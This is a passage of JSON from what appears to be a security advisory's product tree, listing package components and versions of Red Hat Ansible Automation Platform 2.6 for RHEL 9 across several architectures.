"product_reference": "automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64"
},
"product_reference": "automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64"
},
"product_reference": "automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-gateway-server-0:2.6.20260325-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch"
},
"product_reference": "automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.11.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch"
},
"product_reference": "automation-hub-0:4.11.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-hub-0:4.11.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src"
},
"product_reference": "automation-hub-0:4.11.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-platform-ui-0:2.6.7-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch"
},
"product_reference": "automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-platform-ui-0:2.6.7-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
},
"product_reference": "automation-platform-ui-0:2.6.7-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch"
},
"product_reference": "python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-asgiref-0:3.11.1-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src"
},
"product_reference": "python3.12-asgiref-0:3.11.1-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch"
},
"product_reference": "python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-channels-0:4.3.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch"
},
"product_reference": "python3.12-channels-0:4.3.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-channels-0:4.3.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src"
},
"product_reference": "python3.12-channels-0:4.3.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-0:5.2.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch"
},
"product_reference": "python3.12-django-0:5.2.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-0:5.2.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src"
},
"product_reference": "python3.12-django-0:5.2.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch"
},
"product_reference": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src"
},
"product_reference": "python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-filter-0:25.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch"
},
"product_reference": "python3.12-django-filter-0:25.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-django-filter-0:25.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src"
},
"product_reference": "python3.12-django-filter-0:25.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch"
},
"product_reference": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src"
},
"product_reference": "python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch"
},
"product_reference": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src"
},
"product_reference": "python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src"
},
"product_reference": "python3.12-pillow-0:12.1.1-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-0:12.1.1-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le"
},
"product_reference": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x"
},
"product_reference": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64"
},
"product_reference": "python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch"
},
"product_reference": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src"
},
"product_reference": "python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch"
},
"product_reference": "python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulp-container-0:2.19.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src"
},
"product_reference": "python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch"
},
"product_reference": "python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3.12-pulpcore-0:3.49.54-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src"
},
"product_reference": "python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.4-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64"
},
"product_reference": "receptor-0:1.6.4-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
